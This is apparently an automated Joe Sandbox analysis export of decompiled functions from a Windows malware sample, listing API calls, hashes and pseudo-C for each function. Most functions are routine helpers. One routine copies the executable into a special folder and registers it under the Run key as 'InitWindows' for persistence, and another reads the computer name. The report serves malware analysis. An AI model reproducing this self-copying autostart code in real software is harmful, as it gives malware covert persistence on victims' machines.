Opcode ID: baf41935f97038b4aec3aebc40ee66f0d78a45f9089ffe6a3ed0e970e73d6ec4
Instruction ID: 6489ceb9c7219e85a73f4e52de8816baad40cc16e327d30d7444be77cc273711
Opcode Fuzzy Hash: baf41935f97038b4aec3aebc40ee66f0d78a45f9089ffe6a3ed0e970e73d6ec4
Instruction Fuzzy Hash: 97514F72900109ABCB14EFA5C9919EEB779BF48308B2041BEE4167B1C6DF34AB45DF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040331A Relevance: 3.1, APIs: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040331A(short** __ecx, intOrPtr _a4) {
				short** _v8;
				char* _t12;
				void* _t15;
				int _t35;
				short** _t36;

				_push(__ecx);
				_v8 = __ecx;
				E00402F89(_a4);
				if( *__ecx != 0) {
					_t35 = WideCharToMultiByte(0, 0x200,  *__ecx, E00403027(__ecx), 0, 0, 0, 0);
					_t12 = E0040590A(_t35);
					_t36 = _v8;
					_t22 = _t12;
					WideCharToMultiByte(0xfde9, 0,  *_t36, E00403027(_t36), _t12, _t35, 0, 0);
					_t15 = E00403185( &_v8, _t22); // executed
					E00402EEB(_a4, _t15); // executed
					E004058FB(_v8);
					E004058FB(_t22);
				}
				return _a4;
			}

0x0040331d
0x00403325
0x00403328
0x00403331
0x0040334d
0x00403351
0x0040335b
0x0040335e
0x00403372
0x0040337c
0x00403385
0x0040338d
0x00403394
0x00403394
0x0040339f

APIs

Part of subcall function 00403027: lstrlenW.KERNEL32(?,0040340C,?,?,?,0040EE0E,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 0040302E

WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,004049AA,?), ref: 00403347

Part of subcall function 0040590A: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403418,?,?,?,0040EE0E,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00405914

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,004049AA,?,?,?,?,?), ref: 00403372

Part of subcall function 00403185: lstrlenA.KERNEL32(?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 0040318E
Part of subcall function 00403185: lstrlenA.KERNEL32(?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 0040319B
Part of subcall function 00403185: lstrcpyA.KERNEL32(00000000,?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 004031AE

Part of subcall function 00402EEB: lstrcatA.KERNEL32(00000000,?,?,00000000,?,0040338A,00000000,00000000,?,004049AA,?,?,?,?,?), ref: 00402F17

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: lstrlen$ByteCharMultiVirtualWide$AllocFreelstrcatlstrcpy
String ID:
API String ID: 346377423-0
Opcode ID: 2390b5bb62517c9a1c67cea177101ed72141fe2a521490e330d04e0c481c3401
Instruction ID: 0aaded02e3ae7bf0d2239369864b00f8f5a626f43204fa49bd9d75754c287602
Opcode Fuzzy Hash: 2390b5bb62517c9a1c67cea177101ed72141fe2a521490e330d04e0c481c3401
Instruction Fuzzy Hash: 09019671701610BBCB14AFA5CC86FEE7A6DDF09755F00003EB906BB2C1CAB45E008798

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAAE Relevance: 3.0, APIs: 2, Instructions: 50
registryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040EAAE(void** __ecx, void* __edx, short** _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				long _t13;
				void* _t14;
				long _t18;
				short** _t22;
				void** _t30;

				_push(__ecx);
				_push(__ecx);
				_t22 = _a4;
				_t30 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_t13 = RegQueryValueExW( *__ecx,  *_t22, 0,  &_v12, 0,  &_v8); // executed
				if(_t13 != 0) {
					L3:
					_t14 = 0;
				} else {
					_t34 = E004059A9(_v8);
					_t18 = RegQueryValueExW( *_t30,  *_t22, 0,  &_v12, _t15,  &_v8); // executed
					if(_t18 != 0) {
						goto L3;
					} else {
						E00402D5A(_a8, _t34, _v8);
						_t14 = 1;
					}
				}
				return _t14;
			}

0x0040eab1
0x0040eab2
0x0040eab4
0x0040eabd
0x0040eac9
0x0040eace
0x0040ead1
0x0040ead9
0x0040eb0f
0x0040eb0f
0x0040eadb
0x0040eae3
0x0040eaf4
0x0040eafc
0x00000000
0x0040eafe
0x0040eb05
0x0040eb0c
0x0040eb0c
0x0040eafc
0x0040eb15

APIs

RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0040EAD1

Part of subcall function 004059A9: GetProcessHeap.KERNEL32(00000000,000000F4,0040DF9F,?,?,00000000,004054B9,?,?,00000000), ref: 004059AC
Part of subcall function 004059A9: HeapAlloc.KERNEL32(00000000,?,00000000,004054B9,?,?,00000000), ref: 004059B3

RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0040EAF4

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: HeapQueryValue$AllocProcess
String ID:
API String ID: 174754664-0
Opcode ID: 81bfe362913150f285dd3635976442bbc7eb86ba4fee69c9ea084fc7581abd89
Instruction ID: 48af8d47c9c46d6d48ea45f17e0544923e566404208a56d15295a409ea93e58a
Opcode Fuzzy Hash: 81bfe362913150f285dd3635976442bbc7eb86ba4fee69c9ea084fc7581abd89
Instruction Fuzzy Hash: 1B014872600008BFDB04DB92CC4AEAF7BBDEB48250B10417AE602E2250E675AE10DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB4B Relevance: 3.0, APIs: 2, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EB4B(void** __ecx, void* _a4, short** _a8, int _a12, int _a16) {
				long _t10;
				short** _t22;
				void** _t23;

				_t23 = __ecx;
				_t22 = _a8;
				if(_a16 == 0 || E0040D4E2(_a4, _t22) != 0) {
					L4:
					_t10 = RegOpenKeyExW(_a4,  *_t22, 0, _a12, _t23); // executed
					if(_t10 != 0) {
						goto L6;
					}
					return _t10 + 1;
				} else {
					_a16 = 0;
					if(RegCreateKeyExW(_a4,  *_t22, 0, 0, 0, _a12, 0, __ecx,  &_a16) != 0) {
						L6:
						return 0;
					}
					E0040EA99(_t23);
					goto L4;
				}
			}

0x0040eb52
0x0040eb55
0x0040eb5b
0x0040eb90
0x0040eb9a
0x0040eba2
0x00000000
0x00000000
0x00000000
0x0040eb6b
0x0040eb6e
0x0040eb87
0x0040eba7
0x00000000
0x0040eba7
0x0040eb8b
0x00000000
0x0040eb8b

APIs

RegOpenKeyExW.KERNEL32 ref: 0040EB9A

Part of subcall function 0040D4E2: RegOpenKeyExW.ADVAPI32 ref: 0040D4F8

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,?,?), ref: 0040EB7F

Part of subcall function 0040EA99: RegCloseKey.KERNEL32(?), ref: 0040EAA3

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Open$CloseCreate
String ID:
API String ID: 1752019758-0
Opcode ID: 8d475d1efa269e2a793a8d5460e5ebeb4720c3b3d89884df87dbd452481866c6
Instruction ID: 483383324556a78c30100cd56e4b9f635ef1daee245779487f9ab72d29a3a38b
Opcode Fuzzy Hash: 8d475d1efa269e2a793a8d5460e5ebeb4720c3b3d89884df87dbd452481866c6
Instruction Fuzzy Hash: 81011D7120011EBFEF119E92DD80DBB7F6EEF84398714483BF90691150E7799D31AAA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040DDAB Relevance: 3.0, APIs: 2, Instructions: 8
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DDAB(void** __ecx) {
				int _t2;
				void** _t4;

				_t4 = __ecx;
				ReleaseMutex( *__ecx);
				_t2 = CloseHandle( *_t4); // executed
				return _t2;
			}

0x0040ddac
0x0040ddb0
0x0040ddb8
0x0040ddbf

APIs

ReleaseMutex.KERNEL32(?,?,0040DA25,?,00405642,?,00000000,00000000,00000000,00000000,?,0000000A,?,?,00000000,.bss), ref: 0040DDB0
CloseHandle.KERNEL32(?), ref: 0040DDB8

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CloseHandleMutexRelease
String ID:
API String ID: 4207627910-0
Opcode ID: bd04c0faf05e5da37836fd8d965200a9d67b6e31a4a735bb5188e97be76e9af1
Instruction ID: 6549a72a09804a51c5b5dbdcc49fbca951cead2705e5ebd63725c9534e5120a8
Opcode Fuzzy Hash: bd04c0faf05e5da37836fd8d965200a9d67b6e31a4a735bb5188e97be76e9af1
Instruction Fuzzy Hash: 1EB09236004020EFEB666F14FE0C8D97BB5FF08251315447AF281C1038CBE20D209B84

Uniqueness

Uniqueness Score: -1.00%

Function 004010AD Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004010AD(long _a4) {
				void* _t3;

				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				return _t3;
			}

0x004010ba
0x004010c0

APIs

GetProcessHeap.KERNEL32(00000000,00000000,0040F16C,00000800,00000000,00000000,00000000,00000000,?,0040F2C1,?,?,00405268,?,?,000000FE), ref: 004010B3
RtlAllocateHeap.NTDLL(00000000,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 004010BA

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: d80de2b584812445a5d012a9b3be38b67b9cd4226889692adb9e7f67087b90f4
Instruction ID: 967b78372da8232bca40c34d5e51b42e113f641506613627c55fd4d831145703
Opcode Fuzzy Hash: d80de2b584812445a5d012a9b3be38b67b9cd4226889692adb9e7f67087b90f4
Instruction Fuzzy Hash: BAB00279544201FBDF419BE09F4DB897A65AB45712F01C454F745C5160C6B64470DB35

Uniqueness

Uniqueness Score: -1.00%

Function 00405955 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405955(long __ecx) {
				void* _t2;

				_t2 = RtlAllocateHeap(GetProcessHeap(), 0, __ecx); // executed
				return _t2;
			}

0x0040595f
0x00405965

APIs

GetProcessHeap.KERNEL32(00000000,?,00402D70,?,?,?,0040DF25,?,004057B7,?,?,00000000,?,004054CD,00000000), ref: 00405958
RtlAllocateHeap.NTDLL(00000000,?,0040DF25,?,004057B7,?,?,00000000,?,004054CD,00000000,?,?,00000000), ref: 0040595F

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: f88529cb2b588d7d1a9d87cfa275ee3b3a4586af0706b99854f6fd5211fdef5f
Instruction ID: dbc3f1063bcf99e66d9654569c95a39a7b8f942eba6d1e41fd440d5f6a973519
Opcode Fuzzy Hash: f88529cb2b588d7d1a9d87cfa275ee3b3a4586af0706b99854f6fd5211fdef5f
Instruction Fuzzy Hash: 93A01274400100BBDE0097A09E0DB8535189700302F008010F301C0050C5E104308734

Uniqueness

Uniqueness Score: -1.00%

Function 00402E63 Relevance: 2.6, APIs: 2, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00402E63(char** __ecx, void* __eflags, intOrPtr* _a4) {
				char** _v8;
				short* _t15;
				void* _t19;
				int _t39;

				_push(__ecx);
				_v8 = __ecx;
				 *_a4 = 0;
				if(E00402E52(__ecx) > 0) {
					_t39 = MultiByteToWideChar(0, 2,  *__ecx, E00402E52(__ecx) + 2, 0, 0) + _t14;
					_t15 = E00405878(_t39);
					_t26 = _t15;
					E00402E52(_v8);
					MultiByteToWideChar(0xfde9, 0,  *_v8, 0xffffffff, _t15, _t39);
					_t19 = E004033AB( &_v8, _t15); // executed
					E004031FD(_a4, _t19); // executed
					E004058FB(_v8);
					E004058FB(_t26);
				}
				return _a4;
			}

0x00402e66
0x00402e70
0x00402e73
0x00402e7c
0x00402e98
0x00402e9c
0x00402ea4
0x00402ea6
0x00402ebb
0x00402ec5
0x00402ece
0x00402ed6
0x00402edd
0x00402edd
0x00402ee8

APIs

Part of subcall function 00402E52: lstrlenA.KERNEL32(00000000,00402E7A,?,00000000,00000000,?,004030A2,004032D4,00000000,-00000001,?,?,004032D4,00000000,?,?), ref: 00402E59

MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,-00000002,00000000,00000000,?,00000000,00000000,?,004030A2,004032D4,00000000,-00000001,?), ref: 00402E90

Part of subcall function 00405878: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004031A8,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 00405886

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,004030A2,004032D4,00000000,-00000001,?,?,004032D4,00000000), ref: 00402EBB

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: lstrlen$ByteCharMultiVirtualWidelstrcpy$AllocFree
String ID:
API String ID: 4006399363-0
Opcode ID: aef9de512e476804019cae72c11ad9b90a978f54c89de89488448ec66060bbee
Instruction ID: cf57898bd9297ebd289e808a5ac25e5aa556bfb0c2c1c806cc6929ad33ac5412
Opcode Fuzzy Hash: aef9de512e476804019cae72c11ad9b90a978f54c89de89488448ec66060bbee
Instruction Fuzzy Hash: F6019B31600514BBC700FFA5CD86D9E776CDF09754B00403AF901F72D1CAB88E009798

Uniqueness

Uniqueness Score: -1.00%

Function 00405944 Relevance: 2.5, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405944(void* __ecx) {
				int _t2;

				_t2 = HeapFree(GetProcessHeap(), 0, __ecx); // executed
				return _t2;
			}

0x0040594e
0x00405954

APIs

GetProcessHeap.KERNEL32(00000000,?,0040592F,00402D70,?,?,?,0040DF25,?,004057B7,?,?,00000000,?,004054CD,00000000), ref: 00405947
HeapFree.KERNEL32(00000000,?,0040DF25), ref: 0040594E

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 6ba8b8dffc52d20c5f82015536bc0ca2373d7b8a1bf7ddcfb0b728f1c3e95a9a
Instruction ID: d49b9aef03679dac12ff8fec9ae8f831b531a03a97fa7424aa42eb660044a723
Opcode Fuzzy Hash: 6ba8b8dffc52d20c5f82015536bc0ca2373d7b8a1bf7ddcfb0b728f1c3e95a9a
Instruction Fuzzy Hash: A8A00275954101ABDE4557A09E4DB9639289744712F018554F706C5150D6E55460C735

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC15 Relevance: 1.6, APIs: 1, Instructions: 141
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040EC15(void** __ecx, void* __eflags, char _a4, intOrPtr _a8) {
				WCHAR* _v8;
				char _v12;
				char _v20;
				void* _t44;
				void* _t56;
				int _t81;
				char* _t85;
				void** _t116;
				char _t118;
				void* _t120;
				void* _t122;

				_t122 = __eflags;
				_t116 = __ecx;
				E0040D1E6( &_v8); // executed
				_t115 = 0xa;
				_t85 =  &_v12;
				E0040326D(_t85, _t115, _t122); // executed
				_push(_t85);
				_push(_t85);
				_t44 = E0040EA59(_t116, _t85, _t116 + 0x10); // executed
				E0040EA99(_t116);
				_t81 = 0;
				_t118 = _a4;
				if(_t44 == 0) {
					L4:
					if(_a8 == _t81) {
						L10:
						_t81 = 1;
					} else {
						if(_t118 == 0) {
							E004031FD(_t116 + 0x20,  &_v8);
						}
						if(E0040EB4B(_t116 + 4,  *((intOrPtr*)(_t116 + 8)), _t116 + 0x14, 0x20006, _t81) != 0) {
							E004033F3( &_a4, _t116 + 0x54);
							_t56 = E0040EB18(_t116 + 4,  &_a4, E00402DA3( &_v20, _t115, _t116 + 0x20), 1);
							E004058FB(_a4);
							E00402DFF( &_v20);
							if(_t56 != 0) {
								E0040EA99(_t116 + 4);
								goto L10;
							}
						}
					}
				} else {
					_t124 = _t118;
					if(_t118 == 0) {
						goto L4;
					} else {
						_t115 =  *((intOrPtr*)(_t116 + 0xc));
						E004031FD(_t116 + 0x20, E0040D51C( &_a4,  *((intOrPtr*)(_t116 + 0xc)), _t124));
						E0040D4D0(E004058FB(_a4), _t116 + 0x20);
						E004033F3( &_a4, _t116 + 0x4c);
						E004030FB(E00403230(_t116 + 0x20,  *((intOrPtr*)(_t116 + 0xc)), _t124, "\\"), _t124,  &_a4);
						_t107 = _a4;
						E004058FB(_a4);
						if(CopyFileW(_v8,  *(_t116 + 0x20), 0) != 0) {
							_t108 = _t116 + 0x20;
							E00402FE7(_t116 + 0x20, _t115, _t120);
							E004053AA(_t116 + 0x30, _t115, _t120);
							E00405B00( &_v20, _t115, _t108, _t108, _t107, _t107);
							E0040EB4B(_t116, 0x80000001, _t116 + 0x10, 0xf003f, 0);
							E0040EB18(_t116, _t116 + 0x18,  &_v20, 3);
							E0040EA99(_t116);
							E00402DFF( &_v20);
							goto L4;
						}
					}
				}
				E004058FB(_v12);
				E004058FB(_v8);
				return _t81;
			}

0x0040ec15
0x0040ec1e
0x0040ec23
0x0040ec2a
0x0040ec2b
0x0040ec2e
0x0040ec33
0x0040ec34
0x0040ec3c
0x0040ec45
0x0040ec4a
0x0040ec4e
0x0040ec51
0x0040ed1b
0x0040ed1e
0x0040ed8e
0x0040ed90
0x0040ed20
0x0040ed22
0x0040ed2b
0x0040ed2b
0x0040ed47
0x0040ed50
0x0040ed6b
0x0040ed75
0x0040ed7d
0x0040ed84
0x0040ed89
0x00000000
0x0040ed89
0x0040ed84
0x0040ed47
0x0040ec57
0x0040ec57
0x0040ec59
0x00000000
0x0040ec5f
0x0040ec5f
0x0040ec6e
0x0040ec7e
0x0040ec8a
0x0040eca2
0x0040eca7
0x0040ecaa
0x0040ecbe
0x0040ecc7
0x0040ecca
0x0040ecd5
0x0040ecdd
0x0040ecf6
0x0040ed07
0x0040ed0e
0x0040ed16
0x00000000
0x0040ed16
0x0040ecbe
0x0040ec59
0x0040ed94
0x0040ed9c
0x0040eda7

APIs

Part of subcall function 0040D1E6: GetModuleFileNameW.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,0040EF1C,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0040D205

Part of subcall function 0040EA59: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000001,00000001,00000000,?,00000000), ref: 0040EA79

Part of subcall function 0040EA99: RegCloseKey.KERNEL32(?), ref: 0040EAA3

Part of subcall function 0040D51C: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0040D54D

Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Part of subcall function 0040D4D0: SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0040D4D6

Part of subcall function 004033F3: lstrcpyW.KERNEL32(00000000,?), ref: 0040341D

Part of subcall function 004030FB: lstrcatW.KERNEL32 ref: 0040312B

CopyFileW.KERNEL32 ref: 0040ECB6

Part of subcall function 0040EB4B: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,?,?), ref: 0040EB7F
Part of subcall function 0040EB4B: RegOpenKeyExW.KERNEL32 ref: 0040EB9A

Part of subcall function 0040EB18: RegSetValueExW.ADVAPI32 ref: 0040EB37

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Create$Filelstrcpy$CloseCopyDirectoryFolderFreeModuleNameOpenPathSpecialValueVirtuallstrcat
String ID:
API String ID: 1753458232-0
Opcode ID: c51f1018622a148cf489451707a7c4eef82341b76d5ad1e23c158eb2e4452470
Instruction ID: d9795c90dcbe92c500913e9753fc66666fda8b9358875ba125c1dc4dddbe05d4
Opcode Fuzzy Hash: c51f1018622a148cf489451707a7c4eef82341b76d5ad1e23c158eb2e4452470
Instruction Fuzzy Hash: 4D411E72610506BBC708EB62CC92CEEB72DFF54344B40453EB906765D1EF78AE25CA94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA59 Relevance: 1.5, APIs: 1, Instructions: 28
registryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040EA59(void** __ecx, short** _a8) {
				int _v8;
				signed int _t8;

				_push(__ecx);
				_v8 = 0;
				_t8 = RegCreateKeyExW(0x80000001,  *_a8, 0, 0, 1, 1, 0, __ecx,  &_v8); // executed
				if(_t8 != 0) {
					return 0;
				}
				return (_t8 & 0xffffff00 | _v8 == 0x00000001) + 1;
			}

0x0040ea5c
0x0040ea71
0x0040ea79
0x0040ea82
0x00000000
0x0040ea8e
0x00000000

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000001,00000001,00000000,?,00000000), ref: 0040EA79

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6c5d08f0b51f5d9bb4d2852a522280468771e7cb7a1540b5f36fb52c89871906
Instruction ID: 126e78b8e98ac1ed50b8817d6a12211ebe72c92d8cf379e140cbfae975ada2b0
Opcode Fuzzy Hash: 6c5d08f0b51f5d9bb4d2852a522280468771e7cb7a1540b5f36fb52c89871906
Instruction Fuzzy Hash: 60E0D831511215FFDB208B938E08ECB3F6CDB097F4F008515F50AA2190C2B18610D5F4

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1E6 Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040D1E6(signed int* __ecx) {
				char _v8;
				WCHAR* _t3;
				void* _t5;
				signed int* _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t3 = E004059A9(0x7d0);
				 *__ecx =  *__ecx & 0x00000000;
				_t18 = _t3;
				GetModuleFileNameW(0, _t3, 0x3e8);
				_t5 = E004033AB( &_v8, _t18); // executed
				E004031FD(_t15, _t5); // executed
				E004058FB(_v8);
				return _t15;
			}

0x0040d1e9
0x0040d1ec
0x0040d1f3
0x0040d1f8
0x0040d1fb
0x0040d205
0x0040d20f
0x0040d217
0x0040d21f
0x0040d229

APIs

Part of subcall function 004059A9: GetProcessHeap.KERNEL32(00000000,000000F4,0040DF9F,?,?,00000000,004054B9,?,?,00000000), ref: 004059AC
Part of subcall function 004059A9: HeapAlloc.KERNEL32(00000000,?,00000000,004054B9,?,?,00000000), ref: 004059B3

GetModuleFileNameW.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,0040EF1C,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0040D205

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Heaplstrcpylstrlen$AllocFileFreeModuleNameProcessVirtual
String ID:
API String ID: 1499825812-0
Opcode ID: 177a533f214405b643fb08ec30c3552345a1249de13f0b058c2bbfe35ae28216
Instruction ID: 9a946f24f94b4ff50d57b9b2f05cc17b86d69ab272c7eb541e2d9776995a0e06
Opcode Fuzzy Hash: 177a533f214405b643fb08ec30c3552345a1249de13f0b058c2bbfe35ae28216
Instruction Fuzzy Hash: 28E01A62704110ABD604B75ADC57BAE6A6DDFC5366F00003AF606F61C1DEB85E0196A5

Uniqueness

Uniqueness Score: -1.00%

Function 00402F9A Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F9A(WCHAR** __ecx, WCHAR** __edx, void* __eflags) {
				short _v1028;
				WCHAR** _t14;
				WCHAR** _t15;

				_t15 = __edx;
				_t14 = __ecx;
				E00401052( &_v1028, 0, 0x400);
				ExpandEnvironmentStringsW( *_t15,  &_v1028, 0x1ff);
				E004033AB(_t14,  &_v1028); // executed
				return _t14;
			}

0x00402fb3
0x00402fb5
0x00402fb7
0x00402fcd
0x00402fdc
0x00402fe6

APIs

ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00402FCD

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: lstrlen$EnvironmentExpandStringslstrcpy
String ID:
API String ID: 1709970682-0
Opcode ID: 1dfad4109f9e07a857ade1fe60dd524b7fe5146563b8e9d45bc8268b90e57e62
Instruction ID: a89e190ee82d814135067a27a3fc928841fbca027b88ab2bf95e34edfac780c1
Opcode Fuzzy Hash: 1dfad4109f9e07a857ade1fe60dd524b7fe5146563b8e9d45bc8268b90e57e62
Instruction Fuzzy Hash: 6FE048B660011867DB20A6169C46FDA776DDFC4718F040079BB09F21D0E9B4DA4687A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7A6 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D7A6(WCHAR** __ecx) {
				long _v8;
				short _v40;
				signed int _t16;
				WCHAR** _t21;

				_t21 = __ecx;
				_v8 = 0x10;
				_t16 = 8;
				memset( &_v40, 0, _t16 << 2);
				GetComputerNameW( &_v40,  &_v8); // executed
				E004033AB(_t21,  &_v40); // executed
				return _t21;
			}

0x0040d7b0
0x0040d7b2
0x0040d7b9
0x0040d7bf
0x0040d7c9
0x0040d7d5
0x0040d7df

APIs

GetComputerNameW.KERNEL32(?,00000010), ref: 0040D7C9

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
